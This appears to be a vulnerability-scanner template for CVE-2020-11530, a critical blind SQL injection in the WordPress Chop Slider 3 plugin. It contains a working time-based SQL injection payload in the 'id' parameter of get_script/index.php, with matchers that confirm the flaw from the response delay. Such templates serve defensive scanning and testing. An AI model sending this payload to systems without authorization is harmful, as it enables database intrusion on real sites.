id: CVE-2020-11530 info: name: WordPress Chop Slider 3 - Blind SQL Injection author: theamanrawat severity: critical description: | WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://wpscan.com/vulnerability/f10cd7d7-6a31-48e5-994c-b100c846001a - https://github.com/idangerous/plugins/tree/master/Chop%20Slider%203/Chop%20Slider%203%20Wordpress - https://idangero.us/ - https://nvd.nist.gov/vuln/detail/CVE-2020-11530 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-11530 cwe-id: CWE-89 cpe: cpe:2.3:a:idangero:chop_slider:*:*:*:*:*:*:*:* epss-score: 0.65475 metadata: max-request: 1 verified: "true" tags: cve,cve2020,sqli,wpscan,wordpress,wp-plugin,wp,chopslider,unauth http: - raw: - | @timeout 10s GET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "application/javascript")' - 'contains(body, "$(document).ready(function()")' condition: and # Enhanced by md on 2023/03/28